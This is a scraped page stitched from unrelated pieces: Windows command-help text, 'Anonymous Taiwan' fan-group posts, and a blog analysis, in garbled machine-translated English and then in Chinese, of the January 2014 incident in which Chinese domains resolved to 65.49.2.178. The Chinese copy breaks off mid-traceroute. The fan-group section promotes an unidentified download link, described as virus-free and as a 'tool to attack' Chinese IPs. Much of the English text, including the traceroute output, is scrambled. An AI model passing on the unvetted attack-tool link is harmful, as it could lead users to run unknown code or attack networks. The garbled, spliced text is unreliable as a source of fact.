指定要執行的 Windows 2000 指令、程式 (.exe 或 .com 檔案) 或批次程式 (.bat 或 .cmd 檔案)。若該指令需要路徑作為引數,請使用絕對路徑;亦即含有磁碟機代號的完整路徑。如果該指令位在遠端電腦上,請改指定伺服器與共用名稱的 UNC 記號表示法,而不是遠端磁碟機代號。如果該指令不屬於可執行檔 (.exe),您便須在指令前加設 cmd /c;例如:
cmd /c dir > c:test.out
BY:匿名者粉絲團

 

 http://wtfsec.org/3164.html


由于工作需要(渗透测试,漏扫),经常需要使用各种漏洞扫描工具进行测试,并将其报告统一提取至excel文档。有时…共享此文章:点击以在 Twitter 上共享(在新窗口中打开)在 Facebook…
wtfsec.org
 
 *WooW  Taiwan Anonymous power!^
Kill the Communist Party !!!Well~
https://mega.nz/#F!vscT3QaD!K3Uog8vwj5NX6wy99UQbkw 下載吧 無毒

炎帝‎  匿名者 粉絲團 ห


MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 50GB now!
mega.nz





  by Anonymous Asia to our information - {3} An anonymous knight in the Mainland, he said:! "I hate the Communist Party, hate Chinese traditional culture, hate friendships, hate leadership Niubi Hong Hong, hate authoritarianism. Huitie not see posted hate, hate people do not understand the language of the environment on people who criticize forever hate refuse to listen refused to communicate the left and right anger anger, hate only ten minutes to observe the life of people on the judgment of others. "--- The chivalrous brothers name is" Zola Zhou "also shared some exclusive high IT skills, more a very useful tool to attack the Communist Party of IP delicate, so we can join the fiber off 'Communist' and called "zoonotic" !! -

 *Really Thank You! The Anonymous fans ห
匿名者 粉絲團 ห of Taiwan ^^!

 =====
 http://wtfsec.zh-tw




2014 Tuesday, January 21


China's domain name resolves to 65.49.2.178 What is a mistake?

China's domain name resolves to 65.49.2.178 What is a mistake? Let's look it up.

The first part of the description of the accident

  China, a DNS service provider DNSPOD in at 16:18 on January 21st, 2014, said:
January 21, 2014 in the afternoon around 15:10, DNSPod find the root of all domestic gTLDs abnormal, technical staff has contacted the relevant inter-agency coordination process. Root has returned to normal now, but follow-up will have the following problems:
Although the root of the recovery, but there is an error is returned IP address, because the country has cache, so some areas may last 12 hours.
The following are some of the friends in the accident screenshots available online:
Images from http://www.v2ex.com/t/97867 on Click to enlarge




The second part to find a cause from aspects of IP information

All domestic generic top-level domain, is resolved to 65.49.2.178.
Many large-scale failures nationwide website domain name is resolved to 65.49.2.178, which is what IP?
http://www.ip.cn/index.php?ip=65.49.2.178 have the following four answers:
  • GeoIP: Fremont, California, United States Hurricane Electric
  • 65.49.2.178 = North Carolina Cary
  • Dynamic Internet Technology Dynamic Internet Technology Company
  • Anonymous Proxy
Sina science and technology, " Chinese top-level domain root server failure affected most sites "in at 16:16 on January 21 2014 issued a document that:
SAN FRANCISCO January 21 afternoon, according to a number of DNS service providers revealed today 15:00, all of the country root server gTLDs abnormal, resulting in most domestic users can not properly resolve domain names, Internet links to the country caused by the system impact.
Mainly used to manage the Internet root server's home directory. The world is only 13 units, this 13 root domain name servers are "A" to "M", of which 10 provided in the United States, in addition to have a set up in the United Kingdom, Sweden and Japan.
"Simply put, if we want to access this site baidu.com, first point to the root server, root server service then the user points to .com, .com analytic server and then point users to baidu.com." A DNS technical expert He explained that this problem only occurs in China, indicating that the global root server does not have problems, the problem is likely to be domestic network operators.
"This access failure occurs at 15:20 or so, when the user requests a root server, is directed to an IP address (A record), which is completely wrong boot." The experts said.
This is not the Chinese government's use of the domain name in China contaminated root DNS service do not accidentally get out of it a mistake?
A few years ago my domain zuola.com contaminated GFW , GFW known in the domain name to the fake IP pollution are:
  • 64.33.88.161 Trumbull, Connecticut, United States OLM, LLC
  • 202.106.1.2 Beijing, China China Unicom Beijing
  • 216.234.179.13 Edmonton, Alberta, Canada Tera-byte Dot Com
  • 4.36.66.178 United State Level 3 Communications
  • 211.94.66.147 Beijing, China
  • 202.181.7.85 Australia
  • 209.145.54.50 San Marcos, California, United States
The IP in the 2012 April 19 sunrise now this page
http://ffman.exteen.com/20110817/welfare-storm-ch2

Also appeared in a number of Iranian language and Thai language websites, it is clear that IP was as a proxy, may indeed be an anonymous proxy (Anonymous Proxy) used IP.

65.49.2.178 want to try to do the reverse analysis, parsing fails.
In GOOGLE search 178.2.49.65.in-addr.arpa. Only one search result http://dns.l4x.org/65.49.2.178, did not understand what it is, from the IP information in the opinion found "state support DNS poisoning, "the evidence.

http://whois.domaintools.com/65.49.2.178
And
http://whois.arin.net/rest/nets;q=65.49.2.178?showDetails=true&showARIN=false&ext=netref2
Show this IP in Cheyenne, USA Sophidea Inc.
United States Cheyenne Sophidea Inc.

Honeypot project found that this other person IP section IP is often used irrigation send ads:

In http://www.projecthoneypot.org/ip_65.49.2.178 showed that IP is actually 12 user-agent string


This shows that IP is Dynamic Internet Technology company http: //www.myip .cn / 65.49.2.178

Dynamic Internet Technology Inc. is a company? Used Freegate, circumvention tools unbounded people know that this is against the Chinese government long-term blockade of a technology company Falun Gong website, published online in the dynamic variety of circumvention tools.

In http://bgp.he.net/net/65.49.2.0/24#_dns on this site that offers reverse IP analysis results, you can see the company's dynamic web sites are of this 65.49.2.0/24 IP segment:

IP PTR A
65.49.2.9
ultrasurf.us , ultrasurfing.com , wujieliulan.com
65.49.2.10
blogwujie.com , wujieblog.com
65.49.2.13
cbzs.info , jqzx.info
65.49.2.28
feitian-california.org
65.49.2.29
symail.org , synewsletter.com
65.49.2.41
epochdaily.com
65.49.2.101
bet888win.com , clgtchat.com , crystalprofit.net ,
eachother.biz , eva-funds.biz , freeantiddos.com ,
kaplan-properties.com , lizafund.com ,
profit-finance.com , proxy1.idealhosting.org ,
proxy2.idealhosting.org , rekario.com ,
texinkarbotu.com , torrenubosa.com
65.49.2.112
ns1.freeantiddos.com
65.49.2.114
ns2.freeantiddos.com
65.49.2.153
dns.chinese1.org
65.49.2.208
fgmtv.org
65.49.2.216
fgmtv.net , hotdownload.org
65.49.2.247
pudumail.com , shenyunmail.org , sycircle.com
65.49.2.253
weiboleak.com
This shows that the IP is indeed free doors and other circumvention tools used IP. That is, we can put this incident and the Chinese government's Internet blockade operation linked.

I checked 65.49.2.178 this IP and IP segment is located, is a dynamic network for anonymous proxy honeypot project to be detected before, but this IP is not bound to any domain name, does not provide services over the web, you can not reverse analysis being guided past does not exist GFW generate DDoS attack effect argument. http://whois.webhosting.info/65.49.2.178

The third part to find a cause from the root name servers

I try to come to terms from the root name servers.

I have the impression, at least one root server in China, but Tencent said in a report this incident :
Mainly used to manage the Internet root server's home directory, the world is only 13 units. A main root server, placed in the United States. The remaining 12 are supplemented by the root servers, 9 placed in the United States, Europe 2, in the United Kingdom and Sweden, 1 in Asia, in Japan. All the root servers are managed by the American government authorized Internet Assigned Names and Numbers Authority ICANN unified management, responsible for the global Internet domain name root servers, domain name system and IP address management.
Wikipedia also said, " China root server is shut down . " This gives the impression that foreign root name server is wrong. I think it is wrong, the Chinese mainland has F, I these two root domain DNS server mirroring.
October 2003 in Beijing installed a F-root server, October: F-Root installed in Beijing, People's Republic of China;
In 2006, the Chinese territory of the introduction of the root name server J-ROOT and top-level domain server B-gTLD top-level domain server mirroring;
ICANN's root name servers in 78 cities have more than 120 nodes, there are three nodes in Beijing, which is the root name server mirroring:
  1. F-ROOT (telecommunications switching center) by the Internet Software Consortium (ISC = Internet Systems Consortium) and China Telecom jointly build.
  2. J-ROOT (CNC) and China Netcom jointly established by Verisign.
  3. I-ROOT (CNNIC) was established by the Swedish National Internet Exchange (Autonomatic, later called Netnod company) at CNNIC.
F-root in the Asia Pacific region alone 14 mirrored below this figure comes from Asia-Pacific Network Information Centre:


Since the Chinese have root name server node, so the "DNS round-trip cycle (or called ring trip time Round Trip Time)" the RTT algorithm will ensure DNS polling after a period of time will choose the fastest response within the root domain after "learning" server. And the only Chinese mainland site failure occurs, we can see the massive site failure culprit is China's root name server mirroring.

Next, it is to find out which of several of China's real IP address of the root name server, and then test whether these few servers working properly.

But Wikipedia says:
"Chinese mainland F, I these two root domain DNS Mirror [9], but because of the occurrence of multiple DNS pollution and the impact of foreign networks, threaten Internet security and freedom are disconnected from the Internet."
According to Wikipedia I find this story in English: " After DNS problem, Chinese root Server is Shut Dow N ", this link was that" 'withdrawn route announcements' made ​​by the server ", sounded Chinese root mirror is still China, Netnod only Swedish company to withdraw routes advertised by the server, not unmirroring right?

The following picture interception from http://www.root-servers.org ,


I think this track 192.5.5.241 IP in Beijing, where, for the first time actually in the United States:
traceroute to 192.5.5.241 (192.5.5.241), 64 hops max, 72 byte packets
1 192.168.10.1 (192.168.10.1) 1.247 ms 1.114 ms 1.078 ms
2 192.168.1.1 (192.168.1.1) 1.481 ms 1.354 ms 1.313 ms
3 h ××× .s98.ts.hinet.net (168.95.98. ×××) 7.286 ms 7.455 ms 7.190 ms
4 * h242.s25.ts.hinet.net (168.95.25.242) 7.473 ms 7.358 ms
5 tpdt-3012.hinet.net (220.128.4.30) 21.033 ms * 13.669 ms
6 * * *
7 * * r4001-s2.tp.hinet.net (220.128.11.133) 10.042 ms
8 * 211-72-108-153.hinet-ip.hinet.net (211.72.108.153) 144.699 ms 144.337 ms
9 paix.r1.pao1.isc.org (198.32.176.3) 145.071 ms * 145.100 ms
10 f.root-servers.net (192.5.5.241) 144.551 ms 144.491 ms 144.794 ms
The IP 198.32.176.3 recent US IP.

VPN is connected to a second time with another traceroute Jiangsu
traceroute to 192.5.5.241 (192.5.5.241), 64 hops max, 72 byte packets
1 1.1.1.1 (1.1.1.1) 112.112 ms 108.556 ms 108.587 ms
2 221.6.170.1 (221.6.170.1) 119.476 ms 118.213 ms 113.267 ms
3 221.6.161.153 (221.6.161.153) 112.413 ms 118.053 ms 122.491 ms
4 221.6.161.201 (221.6.161.201) 119.346 ms 121.014 ms 114.563 ms
5 219.158.96.149 (219.158.96.149) 150.785 ms 150.258 ms 154.764 ms
6 219.158.4.10 (219.158.4.10) 147.241 ms 147.273 ms 147.740 ms
7 * 219.158.97.254 (219.158.97.254) 213.981 ms 205.347 ms
8 219.158.102.154 (219.158.102.154) 334.414 ms 330.767 ms *
9 las-bb1-link.telia.net (213.248.94.125) 505.146 ms 326.467 ms 316.009 ms
10 dls-bb1-link.telia.net (213.248.80.14) 361.110 ms 490.916 ms 360.979 ms
11 chi-bb1-link.telia.net (80.91.248.208) 404.532 ms 416.520 ms 454.820 ms
12 isc-117366-chi-bb1.telia.net (213.248.85.18) 456.797 ms 465.479 ms 468.200 ms
13 f.root-servers.net (192.5.5.241) 532.196 ms 494.677 ms 423.665 ms

The results show that first went to Jiangsu and Liaoning Unicom, then from f.root-servers.net latest 80.91.248.208 and 213.248.85.18 is actually the European IP. It seems anycast technology (anycast) is mirrored on the behavior of IP routing protocol, an IP address corresponding to multiple servers, so that servers in Europe and the US.

Then I asked Shao held in China to help me look at the F-ROOT tracert root name server
C: \ Users \ chensh aoju> tracert 192.5.5.241
By tracking up to 30 hops to f.root-servers. net [192.5.5.241] route:
1 4 ms 4 ms 17 ms 10.20.0.1 2 6 4 ms 4 ms 23 ms 10.20.0.1 3 ms 4 ms 10 ms 5 ms 58.215.135.21 4 61.177.102.13 5 ms 11 ms 11 ms 31 ms 32 ms 31 202.97.65.201 6 * * * Request timed out. 7 32 ms 32 ms 33 ms 18.254.120.106. static.bjteleco M.net [106.120.254 .18] 8 42 ms 34 ms 32 ms 219.142.18.54 9 31 ms 32 ms 33 ms 218.241.102.101 10 30 ms 39 ms 33 ms 218.241.107.90 11 30 ms 72 ms 32 ms f.root -servers. net [192.5.5.241]
Tracking is complete.
Well, this time from the nearest 192.5.5.241 IP 218.241.107.90 is a CNNIC's IP, can prove F-ROOT still on the Chinese Wikipedia said to write the " Chinese root server is shut down , "is wrong. CNNIC found here only the F-ROOT, in accordance with the foregoing argument, there should be a China Telecom's F-ROOT, China Telecom's IP may need to check to get this F-ROOT position.

J-ROOT also in Beijing:
C: \ Users \ chensh aoju> tracert 192.58.128.30
By tracking up to 30 hops to j.root-servers. net [192.58.128.30] route:
1 5 ms 3 ms 3 ms 10.20.0.1 2 3 4 ms 4 ms 24 ms 5 ms 10.20.0.1 3 ms 9 ms 58.215.156.185 4 7 6 ms 5 ms 10 ms 5 ms 58.215.156.185 9 ms 7 ms 202.97.39.113 6 8 ms 11 ms 11 ms 27 ms 26 ms 202.97.48.30 7 26 ms 219.158.32.93 8 33 ms 32 ms 31 ms 219.158.13.21 9 30 ms 40 ms 30 ms 30 ms 123.126.0.66 10 * 11 138 * 61.51.112.42 134 ms 136 ms 37 ms 33 ms 61.148.156.202 12 ms 33 ms BT-235-194.bta. net.cn [202.106.235.19 4] 13 25 ms 36 ms 32 ms j.root-servers. net [192.58.128.30] track is completed.
tracert I-ROOT of IP actually ran Japan went:
C: \ Users \ chensh aoju> tracert 192.36.148.17
By tracking up to 30 hops to i.root-servers. net [192.36.148.17] route:
1 5 ms 4 ms 3 ms 10.20.0.1 2 10 ms 3 ms 4 ms 10.20.0.1 3 9 ms 4 ms 3 ms 58.215.135.21 4 7 ms 15 ms 14 ms 58.215.135.41 5 7 ms 15 ms 71 ms 202.97.27.6 6 25 ms 15 ms 11 ms 24 ms 202.97.82.53 7 8 ms 10 ms 202.97.50.250 8 41 ms 39 ms 39 ms 15 ms 13 ms 202.97.35.22 9 202.97.60.97 10 269 ms 13 ms 266 ms 266 ms 202.232.8.129 11 202 ms * * osk004bb11.IIJ. Net [58.138.106.201 ] 12 * 128 ms 97 ms osk004bf01.IIJ. Net [58.138.82.189] 13 * * * Request timed out. 14 273 ms * * tky001bb10.IIJ. Net [58.138.80.14] 15 177 ms * * tky001ix04.IIJ. Net [58.138.100.26] 16 * * 185 ms as8674.dix-ie.j p   [202.249.2.180 ] * 125 ms 17 117 ms i.root-servers. net [192.36.148.17]
Tracking is complete.
Another server
C: \ Documents and Settings \ Admini strator> tracert 192.36.148.17
Tracing route to i.root-servers. net [192.36.148.17] over a maximum of 30 hops:
1 5 ms 3 ms 2 ms htuidc.bgp [42.51.7.65] 2 3 ms 2 ms 2 ms htuidc.bgp.ip [103.22.188.65 ] 3 3 ms 2 ms 2 ms route53.htu.cc   [103.22.188.53 ] 4 4 ms 1 ms 12 ms hn.kd.ny.adsl [182.118.124.17 ] 5 4 ms 1 ms 1 ms pc177.zz.ha.cn [61.168.124.177 ] 6 58 ms 55 ms 56 ms pc137.zz.ha.cn [61.168.255.137 ] 7 53 ms 53 ms 53 ms 219.158.99.153 8 114 ms 122 ms * 219.158.3.222 9 163 ms * 148 ms 219.158.97.54 10 270 ms * 205 ms 219.158.38.98 11 * 244 ms 237 ms ae-1.r01. tokyjp 01.jp.bb.gin.nt t.net [129.250.3.2 41] 12 93 ms 95 ms 97 ms peering.r1.jpp. dnsnode.net   [210.173.176.43 ] 13 299 ms 69 ms 297 ms i.root-servers. net [192.36.148.17]
Trace complete.
Or go to Japan, it seems that with the Wuxi Telecom, Beijing Internet network access and Henan were unable to prove i-root in China is not. According Yiming said:
Which I in 2010 GFW node failures since returned to overseas contaminated dns records who had been blamed fiercely heads, administrators all over the world and they cry unrelated, we are interested can looking through the old stories https: // lists .dns-oarc.net / pipermail / dns-operations / 2010-March / 005260.html
It seems I-Root node trouble since 2010 in the international community after the closed route advertisement, has not broadcast, no wonder the country is also used to track tracert less than i-root node.
The first tracert L-ROOT of IP also ran to Japan, it is estimated to live Chan Siu move faster Wuxi visit Japan. Henan second exchange server:
C: \ Documents and Settings \ Admini strator> tracert 199.7.83.42
Tracing route to l.root-servers. net [199.7.83.42] over a maximum of 30 hops:
1 13 ms 3 ms 2 ms htuidc.bgp [42.51.7.65] 2 3 ms 3 ms 2 ms htuidc.bgp.ip [103.22.188.65 ] 3 3 ms 3 ms 2 ms route53.htu.cc   [103.22.188.53 ] 4 2 ms 9 ms 2 ms hn.kd.ny.adsl [182.118.124.17 ] 5 2 ms 1 ms 2 ms hn.kd.ny.adsl [125.45.253.25] 6 62 ms 63 ms 63 ms pc233.zz.ha.cn [61.168.194.233 ] 7 22 ms 19 ms 19 ms 219.158.98.217 8 18 ms 15 ms 15 ms 202.96.12.190 9 * * * Request timed out. 10 18 ms 33 ms 19 ms 16 ms 35 ms 11 202.106.37.154 16 ms 61.49.41.74 12 16 ms 15 ms 16 ms l.root-servers. net [199.7.83.42]
Trace complete.
This had a China's L-ROOT, and from the L-ROOT recent 61.49.41.74 is a Beijing Unicom IP http://www.ip.cn/index.php?ip=61.49.41.74

Currently prove F-ROOT, J-ROOT, L-ROOT has mirrored in Beijing, China. In http://www.root-servers.org on this page search Beijing, the display F, I, J, L four servers have mirrored in Beijing, China.

Currently, there are 13 sets of root name servers, including the United States 10, Europe 2 (in the United Kingdom and Sweden), Asia 1 (in Japan), and in the world there are more than three hundred root mirror deploy the service node in China Mainland China has five, covering the F, I, J, L root. Wherein, F root causes of ISC (Internet Systems Consortium) agency cooperation and CNNIC, in Beijing to build a two F-root mirror service nodes, respectively, to provide network access by China Telecom and CNNIC; Verisign cooperation with China Unicom, the construction of the J root in Beijing Mirror server, China Unicom to provide access. The other two network room environment provided by the CNNIC, respectively, to cooperate with Netnod, ICANN, in Beijing the construction of I, L root mirror service node. Currently China has the relevant bodies to continue international cooperation and implement more root mirror node.
Say on the right, F-ROOT two, I-ROOT, J-ROOT and L-ROOT each one, CNNIC's F-ROOT found, but China Telecom's F-ROOT not found in China, I-ROOT I have no way to prove that in China. Which perhaps readers can find tracert look, if you can find trouble stick it under tracert results.

I found gtld-servers is 13, I think that with the F-ROOT these have anything to do with it, this b.gtld-servers. Beijing also seems to have a net:
C: \ Users \ chensh aoju> tracert 192.33.14.30
By tracking up to 30 hops to b.gtld-servers. net [192.33.14.30] route:
1 8 ms 5 ms 7 ms 10.20.0.1 2 ms 5 ms 3 ms 3 ms 10.20.0.1 3 7 7 ms 6 ms 61.177.102.105 4 5 6 ms 4 ms 8 ms 5 ms 61.177.102.105 7 ms 7 ms 202.97.39.233 6 15 ms 11 ms 11 ms 94 ms 98 ms 202.97.48.42 7 96 ms 219.158.35.89 8 134 ms 134 ms 214 ms 219.158.5.217 9 70 ms 34 ms 32 ms 38 ms 123.126.0.70 10 * 11 37 * 124.65.56.18 ms 29 ms 30 ms 40 ms 37 ms 12 61.148.6.42 36 ms BT-235-194.bta. net.cn [202.106.235.19 4] 13 36 ms 51 ms 45 ms b.gtld-servers. net [192.33.14.30]
Tracking is complete.
From b.gtld-servers.net latest IP 202.106.235.194 Unicom.

The question now is, do not know in the territory of China F, I, J, L five root name servers, as well as similar b.gtld-servers.net this top-level domain DNS server has done in terms of pollution, but reasonable doubt China's DNS root servers dishonest, evidence in the following two links, this event occurred in 2010:

In 2010, the Netherlands Online reported that " Chinese Internet censorship trial out of the border accidentally . "
March 24, a Domain Name System (DNS) management staff in Chile found that abnormal flow of Internet information to Youtube, Twitter, Facebook issued access requirements are hijacked to China's fake websites and IP addresses.
This link also says foreign Internet users get IP addresses from the root name servers Twitter China after contamination, Facebook, YouTube's.

Part IV Conclusion

DNS query process introduced
Next encounter similar to today's root domain name service returns a false IP address how to verify it? I recommend the following steps:
  1. First determine the F-ROOT, I-ROOT, J-ROOT, L-ROOT of IP survive in the Chinese territory, the methodology is tracert several mirrored IP, their IP is globally consistent, but the mapping multiple hosts, you should Confirm your network from the nearest root domain host is online. IP root domain host to this find http://www.internic.net/domain/named.root
  2. Open a command line, enter nslookup
  3. Then enter the set q = PTR
  4. Enter the server 192.5.5.241
  5. Just enter a .com domain name, such as zuola.com
  6. Now returns a bunch of results tell you where authoritative answer should be: Authoritative answers can be found from:
    com nameserver = h.gtld-servers.net.
    com nameserver = j.gtld-servers.net.
    com nameserver = k.gtld-servers.net.
    com nameserver = g.gtld-servers.net.
    com nameserver = m.gtld-servers.net.
    com nameserver = i.gtld-servers.net.
    com nameserver = c.gtld-servers.net.
    com nameserver = f.gtld-servers.net.
    com nameserver = a.gtld-servers.net.
    com nameserver = d.gtld-servers.net.
    com nameserver = e.gtld-servers.net.
    com nameserver = b.gtld-servers.net.
    com nameserver = l.gtld-servers.net.
    a.gtld-servers.net internet address = 192.5.6.30
    b.gtld-servers.net internet address = 192.33.14.30
    c.gtld-servers.net internet address = 192.26.92.30
    d.gtld-servers.net internet address = 192.31.80.30
    e.gtld-servers.net internet address = 192.12.94.30
    f.gtld-servers.net internet address = 192.35.51.30
    g.gtld-servers.net internet address = 192.42.93.30
    h.gtld-servers.net internet address = 192.54.112.30
    i.gtld-servers.net internet address = 192.43.172.30
    j.gtld-servers.net internet address = 192.48.79.30
    k.gtld-servers.net internet address = 192.52.178.30
    l.gtld-servers.net internet address = 192.41.162.30
    m.gtld-servers.net internet address = 192.55.83.30
    a.gtld-servers.net has AAAA address 2001: 503: a83e :: 2: 30
  7. Enter the server 192.5.6.30
  8. Enter zuola.com
  9. This will return Server: 192.5.6.30
    Address: 192.5.6.30 # 53

    Non-authoritative answer:
    *** Can not find zuola.com: No answer

    Authoritative answers can be found from:
    zuola.com nameserver = ns1.dreamhost.com.
    zuola.com nameserver = ns2.dreamhost.com.
    ns1.dreamhost.com internet address = 66.33.206.206
    ns2.dreamhost.com internet address = 208.96.10.221
  10. The above results returned contains the real nameserver domain names and IP, enter the server 66.33.206.206
  11. Returns> server 66.33.206.206
    Default server: 66.33.206.206
    Address: 66.33.206.206 # 53
  12. Enter set q = a
  13. Enter zuola.com
  14. Returns> zuola.com
    Server: 66.33.206.206
    Address: 66.33.206.206 # 53

    Name: zuola.com
    Address: 69.163.141.215
  15. Thus, we found the real IP is 69.163.141.215 the domain zuola.com
The first step to find the nearest root domain first, second step gTLD root domain return address, return to the third step gTLD name server address and IP, the fourth step name server returns the real IP domain.

ROOT Server return the domain name to which gTLD should find, gTLD provides a recent server tells you on which DNS server (name server) record of your domain name corresponding to the IP, the server also registered gTLD DNS server (name server) domain names and real IP, in my case, ns1.dreamhost.com and 66.33.206.206 information is recorded in gtld-servers.net A to the M's 13 servers.

DNS clearer description of the picture below the parsing process:

At 15:00 on January 21, 2014 about the operation but did not dig the figure of the second and the third step returns gTLD server and name server process, skip this part of the name server returns the address of a 65.49.2.178, the following two maps are not gTLD servers appear, there is no name server, which returns with a very short delay 65.49.2.178 this fake IP. The first figure shows only 27 milliseconds, the second figure shows only 36 milliseconds.



My understanding is that there is a boundary router on GFW room, the UDP DNS query result in contamination of normal, due to the passing GFW, it returns a false IP. A few years ago only GFW in China's outbound traffic pollution DNS query results, and now the room was GFW flow also examined.

My conclusion is that this is a DNS pollution incidents within China, is to try to examine the device in the engine room of the GFW do when Internet blockade made honest mistake (unintentionally committed fault), may be blocked when operating into IP Freegate block all domain names.



About Me

My Photo
I am an atypical cynical, I like to play, like freedom, like do something useful or interesting things, like to see the world with fresh, like to do something that makes me happy to get simple things - small things in search of the pleasure - happiness is always very simple. No rhetoric and lofty ideals, mixed day to day.

I hate the Communist Party, hate Chinese traditional culture, hate friendships, hate leadership Niubi Hong Hong, hate authoritarianism, hate Huitie not see posted, nasty people do not understand the language of the environment on people who criticize forever hate refuse to listen refused to communicate The left and right anger anger, hate only ten minutes to observe others to judge my whole life.

No ambition, no lottery, no gambling, no smoking, no paranoia, go with the flow. Most of the time, in addition to doing otaku, other times on a vehicle.
So to live, very good.

On the other hand, I try not to increase the burden on the planet, but also try not to add burden to friends, expect the Earth is getting better, expect more and more of my friends happy.

Blog Archive


 =====
  http://wtfsec.zh-tw



2014年1月21日星期二


中国的域名解析到65.49.2.178 是一个什么失误?

中国的域名解析到65.49.2.178 是一个什么失误?让我们来查一查。

第一部分 事故描述

 中国的一家DNS服务商DNSPOD于 2014 年 1 月 21 日 16:18 说:

2014年1月21日下午15:10左右,DNSPod发现国内所有通用顶级域的根出现异常,技术人员已联系相关机构协调处理。目前根已恢复正常,但是后续还会存在以下问题:
根虽已恢复,但还有返回错误IP地址,因为各地有缓存,所以部分地区可能会持续12小时。
以下是一些网友在网上提供的事故截图:
图片来自 http://www.v2ex.com/t/97867 上的,点击可看大图




第二部分 从IP资料方面找原因

国内所有通用的顶级域名,被解析到65.49.2.178。
全国大规模网站故障 许多域名被解析到65.49.2.178,这是一个什么IP?
http://www.ip.cn/index.php?ip=65.49.2.178 有下面四种答案:
  • GeoIP: Fremont, California, United States Hurricane Electric
  • 65.49.2.178=美国 北卡罗莱纳州卡里镇
  • Dynamic Internet Technology 动态互联网技术公司
  • Anonymous Proxy
新浪科技的《中国顶级域名根服务器故障 大部分网站受影响》 在 2014年01月21日 16:16发文说:
新浪科技讯 1月21日下午消息,据多家DNS服务商透露,今日下午3点,全国所有通用顶级域的根服务器出现异常,导致国内大部分用户无法正确解析域名,对全国互联网链接造成系统性影响。
根服务器主要用来管理互联网的主目录。全世界只有13台,这13台根域名服务器中名字分别为“A”至“M”,其中10台设置在美国,另外各有一台设置于英国、瑞典和日本。
“简单的说,如果我们要访问baidu.com这个网站,先要指向根服务器,根服务再将用户指向.com服务器,.com的解析服务器再把用户指向 baidu.com。”一位DNS技术专家解释说,这次的问题仅出现在中国,说明全球根服务器并未出现问题,问题很可能是国内网络运营商。
“这次访问故障出现在下午3点20分左右,当用户请求根服务器时,被指向一个IP地址(A记录),这是完全错误的引导。”上述专家表示。
这是不是中国政府利用位于中国的域名根服务做DNS污染时不小心弄出来的一个失误呢?
前些年我的域名zuola.com被GFW污染,所已知GFW对域名污染的给的假IP有:
  • 64.33.88.161 Trumbull, Connecticut, United States OLM, LLC
  • 202.106.1.2 Beijing, China China Unicom Beijing
  • 216.234.179.13 Edmonton, Alberta, Canada Tera-byte Dot Com
  • 4.36.66.178 United State Level 3 Communications
  • 211.94.66.147 Beijing, China
  • 202.181.7.85 澳大利亚
  • 209.145.54.50 San Marcos, California, United States
这个IP在2012年04月19日 出现在这个网页上
http://ffman.exteen.com/20110817/welfare-storm-ch2
也出现在一些伊朗语言和泰国语言的网站上,显然这个IP曾被当成代理,可能确实是一个匿名代理(Anonymous Proxy)用过的IP .
想尝试对65.49.2.178 做反向解析,解析失败。
在GOOGLE搜索 178.2.49.65.in-addr.arpa. 只有一条搜索结果 http://dns.l4x.org/65.49.2.178 ,没看懂是什么,从IP信息里看来找不到“国家支持的DNS污染”的证据。

http://whois.domaintools.com/65.49.2.178

http://whois.arin.net/rest/nets;q=65.49.2.178?showDetails=true&showARIN=false&ext=netref2
显示这个IP在美国 夏延市 Sophidea Inc.
United States Cheyenne Sophidea Inc.
蜜罐项目发现这个IP段的其他IP常被人拿来灌水发广告:
在 http://www.projecthoneypot.org/ip_65.49.2.178 显示有这个IP居然12个user-agent 字符串
这里显示这个IP是Dynamic Internet Technology公司的 http://www.myip.cn/65.49.2.178 
Dynamic Internet Technology公司是个什么公司?用过自由门、无界的翻墙工具的人都知道,这是对抗中国政府长期封锁法轮功网站的一家技术公司,在动态网上发布各种翻墙工具。
http://bgp.he.net/net/65.49.2.0/24#_dns 这个网站上,提供了IP的反向解析结果,可以看到动态网公司的网站都在这个65.49.2.0/24 的IP段上:
可见这个IP确实是自由门等翻墙工具用过的IP。也就是说,可以把这个事故和中国政府的网络封锁操作联系起来。

我查过 65.49.2.178  这个IP和所在的IP段,是动态网用于匿名代理,被蜜罐项目侦测到过,但这个IP没有绑定任何域名,未提供过web服务,无法反向解析,不存在被GFW引导过去产生DDoS攻击效果的说法。 http://whois.webhosting.info/65.49.2.178

第三部分 从根域名服务器找原因

我尝试从根域名服务器方面来找。
我印象中,至少有一台根服务器在中国,但腾讯网在报道此次事件时说
根服务器主要用来管理互联网的主目录,全世界只有13台。1个为主根服务器,放置在美国。其余12个均为辅根服务器,其中9个放置在美国,欧洲2个,位于 英国和瑞典,亚洲1个,位于日本。所有根服务器均由美国政府授权的互联网域名与号码分配机构ICANN统一管理,负责全球互联网域名根服务器、域名体系和 IP地址等的管理。
维基百科上也说“中国根服务器被关闭”。这样给人印象是国外根域名服务器有错。我觉得不对,中国大陆有F、I这2个根域DNS服务器镜像。
2003年十月就在北京安装了一个F-root服务器,October: F-Root installed in Beijing, People's Republic of China; 
2006年,中国境内引进根域名服务器J-ROOT和顶级域名服务器B-gTLD顶级域名服务器镜像;
ICANN的根域名服务器在78个城市有120多个节点为,在北京有三个节点,也就是根域名服务器镜像:
  1. F-ROOT(电信,交换中心)由互联网软件联盟(ISC=Internet Systems Consortium)和中国电信共同建立。
  2. J-ROOT(网通) 由Verisign和网通共同设立。
  3. I-ROOT(CNNIC)  由瑞典国家互联网交换中心(Autonomatic,后来叫Netnod公司)在CNNIC设立。
在亚太地区的F-root就有14个镜像,下面这张图来自亚太互联网络信息中心:
由于在中国有根域名服 务器节点,所以“域名解析往返周期(或叫环程时间Round Trip Time)"的RTT算法会保证经过一段DNS轮询时间“学习”后会选择响应最快的境内根域名服务器。并且此次仅有中国大陆出现网站故障,可见此次大规模 网站故障的罪魁祸首是中国的根域名服务器镜像。
接下来,就是要找出中国的这几台根域名服务器的真实IP地址,然后测试一下这几台服务器是否正常工作。
不过维基百科上说:
“中国大陆有F、I这2个根域DNS镜像[9],但因为多次发生DNS污染而影响外国网络,威胁互联网安全和自由而被断开与国际互联网的连接。”
我根据维基百科找到这篇英文报道:《After DNS problem, Chinese root server is shut down》, 这个链接里的说“‘withdrawn route announcements’ made by the server“,听上去中国根镜像还在中国,只是瑞典公司Netnod用服务器撤销路由通告,不算取消镜像吧?
下面的图片截取自 http://www.root-servers.org , 
我想跟踪 192.5.5.241 这个IP在北京哪里,第一次居然是在美国:
traceroute to 192.5.5.241 (192.5.5.241), 64 hops max, 72 byte packets
 1  192.168.10.1 (192.168.10.1)  1.247 ms  1.114 ms  1.078 ms
 2  192.168.1.1 (192.168.1.1)  1.481 ms  1.354 ms  1.313 ms
 3  h×××.s98.ts.hinet.net (168.95.98.×××)  7.286 ms  7.455 ms  7.190 ms
